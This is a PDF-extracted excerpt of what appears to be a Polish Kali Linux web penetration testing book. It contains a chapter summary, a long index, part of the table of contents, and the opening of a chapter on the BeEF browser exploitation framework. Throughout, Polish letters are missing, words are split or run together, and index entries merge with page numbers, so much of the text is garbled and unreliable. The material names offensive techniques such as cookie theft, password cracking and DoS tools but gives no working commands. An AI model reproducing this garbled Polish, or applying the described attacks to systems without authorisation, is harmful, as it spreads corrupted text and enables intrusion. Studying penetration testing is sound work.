PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 4: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

5

Rozdzia 4 Ataki na klienty aplikacji internetowych 147

In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149

Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162

Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169

Has a w systemie Windows 171Has a w systemie Linux 173

Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185

Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191

Podsumowanie 191

Rozdzia 5 Ataki na metody uwierzytelniania 193

Ataki na zarz dzanie sesjami 195Clickjacking 196

Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198

Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217

Wstrzykiwanie kodu SQL 218sqlmap 221

Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224

Techniki XSS cookie stealing i Authentication hijacking 225

Kup książkę Poleć książkę

Spis tre ci

6

Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229

Podsumowanie 229

Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231

BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255

THX-SSL-DOS 257Scapy 259Slowloris 261

LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266

DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270

Podsumowanie 270

Rozdzia 7 Przeciwdzia anie i zapobieganie 271

Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277

Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281

Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284

Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287

Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295

Podsumowanie 300

Kup książkę Poleć książkę

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

